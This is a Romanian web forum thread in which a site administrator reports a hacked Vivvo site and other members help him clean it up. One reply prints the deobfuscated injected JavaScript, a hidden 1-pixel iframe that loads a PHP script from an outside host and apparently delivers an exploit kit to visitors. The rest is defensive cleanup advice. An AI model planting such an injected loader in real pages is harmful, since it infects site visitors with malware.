Am nevoie de un pic de ajutor

[Robert]

Buna seara dragi colegi.
De o buna perioada de timp ma confrunt cu o serie de atacuri masive de hack care imi fac tandari buna parte dintre siteurile pe care le administrez.

Bunaoara, acum, la un interval de doar doua zile, un site ce ruleaza pe vivvo mi-a fost spart iar si injectat cu un cod suspect. Ceva parareri despre cum as putea securiza aceasta platforma?

Codul malitios este acesta:

http://pastebin.com/hFrvaVCh

[Ciprian.Olaru]

nu stiu ce sa spun concret despre cazul prezentat, insa cele mai intalnite cauze ale injectiilor de tipul asta sunt:
* virus in calculatorul personal care fura parolele de ftp - solutie: schimbarea parolelor de la un calculator clean si apoi inlaturarea codului injectat
* updateuri ale platformei nefacute la timp

bauiesc ca nu e noutate ce zic, insa in situatii din astea uneori sarim peste elementele de baza

[inSecure]

Ma uit eu putin si poate iti revin cu tot codul.

[Robert]

merci.
Ciudat este ca rahatul asta imi apare doar in chrome.

[inSecure]

Poti sa imi dia pe privat URL-ul ?

--- Later Edit --- (ca mi-a fost lene sa apas "Edit")

Voila (codul de mai sus --ala uratul-- e de fapt cel mai de jos. Cel de mai sus este obfuscat):

(function() {
var xwu = document.createElement('iframe');

xwu.src = 'http://ftp.fly-euroharmony.com/site/XASASDAS.php';
xwu.style.position = 'absolute';
xwu.style.border = '0';
xwu.style.height = '1px';
xwu.style.width = '1px';
xwu.style.left = '1px';
xwu.style.top = '1px';

if (!document.getElementById('xwu')) {
document.write('<div id=\'xwu\'></div>');
docum nt.getElementById('xwu').appendChild(xwu);
}
})();

--- Later Edit --- (ca mi-a fost lene sa apas "Edit")

Acum,

Cum te-ai virusat e alta poveste..

[Robert]

romaneste please
unde naiba e mizeria asta? si ce trebuie facut?

[inSecure]

Roby,

Mizeria asta ce face:
1. Iti pune un iframe pe pagina
2. Din iframe face o cererea catre script-ul de PHP (l-am modificat sa nu se viruseze cineva)
3. De acolo se incearca sa infecteze userul (care iti acceseaza pagina) cu un virus. Descriere aici: Web Attack: Cool Exploit Kit Website: Attack Signature - Symantec Corp.

Ce poti face:
1. Ia un antivirus mai bun (scaneaza-ti din nou tot). Eu folosesc Symantec (dar nu e free). Poti incearca Avira/Avast etc.
2. Verifica fisierele php, sa nu ami existe acest "virus"
2'. Fa update la tot: Java, Adobe, Windows, Browsere etc (sa nu te mai virusezi pe viitor)
3. In functie de ce CMS folosesti vezi sa fie totul la ultima versiune sau scaneaza-l de tot felul de vulnerabilitati: RFI, SQLinjection, LFI etc
4. Schimba parolele la FTP + Alte conturi (sa fii sigur)

Cam atat din pacate..

[Robert]

Merci fain.
Sper sa reusesc sa ii dau de cap.

[Ciprian.Olaru]

4. Schimba parolele la FTP + Alte conturi (sa fii sigur)

eu as incepe cu punctul asta (executat de pe un calculator nevirusat, preferabil fara windows), apoi as trece la curatarea fisierelor din server, apoi as repeta schimbarea parolelor;
separat, trebuie facuta si curatarea calculatorului virusat (fara login ftp de acolo pana nu e clean)

[inSecure]

Roby,

Revin cu o comanda sa te ajute putin.

Am revenit:
1. Downloadeaza tot site-ul pe C:\backup\
2. Deschide cmd.exe si intra in C:\backup (comanda: cd c:\backup)
2. Da comanda in command prompt (cmd.exe): findstr /s "ff=String" *.* > c:\roby.txt
4. Deschide roby.txt (din C si vezi toate fisierele care au ff=string in ele.
5. Fa curatenie